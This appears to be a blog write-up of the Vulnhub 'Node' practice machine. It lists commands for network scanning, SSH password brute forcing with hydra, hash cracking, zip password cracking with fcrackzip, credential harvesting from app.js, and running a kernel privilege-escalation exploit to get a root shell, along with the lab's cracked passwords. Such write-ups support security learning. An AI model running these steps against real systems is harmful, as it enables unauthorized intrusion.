(Vulnhub exercise) -- Node penetration practice

Keywords: Linux ssh

(vlunerable practice) – Node penetration practice

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This article is a reference to the boss Orange lady Written in my article

The following are my notes following his article

Scan host (netdiscover)

sudo netdiscover -i eth0 -r

Target host IP:

Port scan

nmap -A

fingerprint identification


Directory scan

dirsearch  -u

ssh weak password scanning

hydra -L top500.txt -P top6000.txt  ssh  

msf scan ssh

use auxiliary/scanner/ssh/ssh_version
set rhosts

burpsuite site map

Access data from site map

MD5 decryption sha256

f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240 -> spongebob
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73 -> snowflake
  • Successfully cracked the passwords of two accounts, namely:
  • tom spongebob
  • mark snowflake

Sign in

Access the data again

MD5 decryption sha256

  • Successfully cracked the password of admin account, which are:

  • myP14ceAdm1nAcc0uNT manchester

Open the downloaded content and see a pile of ciphertext

Through the last "=" you can guess that it is encrypted by base64;

Attempt to open as a compressed package

base64 -d myplace.backup > myplace
unzip myplace 

Use the tool fcrackzip to crack the password

fcrackzip -v -b -u -c a -p magicaaaa myplace

-v is that you can see more information
-b. brute force cracking
-u use zip to try
-c specifies the character a to indicate that the password is composed of lowercase letters
-p get an initialization password aaaaaa. If it is a pure number 000000, of course, the length here is 6
PASSWORD FOUND!!!: pw == magicword


For node.js, we should first be familiar with its architecture. app.js:

Project entry and program startup documents. First view the app.js file;

cat app.js

cat app.js | grep url
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

Try ssh Remote Connection

  • We found a Node.js connection to MongoDB;
  • The user name is mark and the password is 5AYRft73VtFpc84k;
  • The user name and password obtained are likely to be suitable for ssh and can be tried;
ssh mark@

mark@node:~$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

Find the vulnerability through the searchsploit command

searchsploit Ubuntu 16.04

Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Es | linux/local/44298.c

Since the limitation of / tmp file is small, upload the file to the TMP file of the target.

scp /usr/share/exploitdb/exploits/linux/local/44298.c mark@

Take advantage of this vulnerability for local rights raising

mark@node:/tmp$ gcc -pthread 44298.c -o exp -lcrypt
mark@node:/tmp$  ./exp 
task_struct = ffff88002b59c600
uidptr = ffff88002e1da484
spawning root shell

  • The js page in the front-end page is very important, especially the information similar to the directory;

  • If the last ciphertext is "=" or "= =", the ciphertext may be encrypted by base64;

  • If the information cannot be viewed after base64 decryption, you can try to output the decrypted information to a file

  • And open it in the form of unzipped zip package;

  • Understand the framework and directory structure of the website;

  • For node.js, we should first be familiar with its architecture. app.js:

  • Project entry and program startup documents. Generally, first view the app.js file;

Posted by deolsabh on Mon, 20 Sep 2021 20:41:56 -0700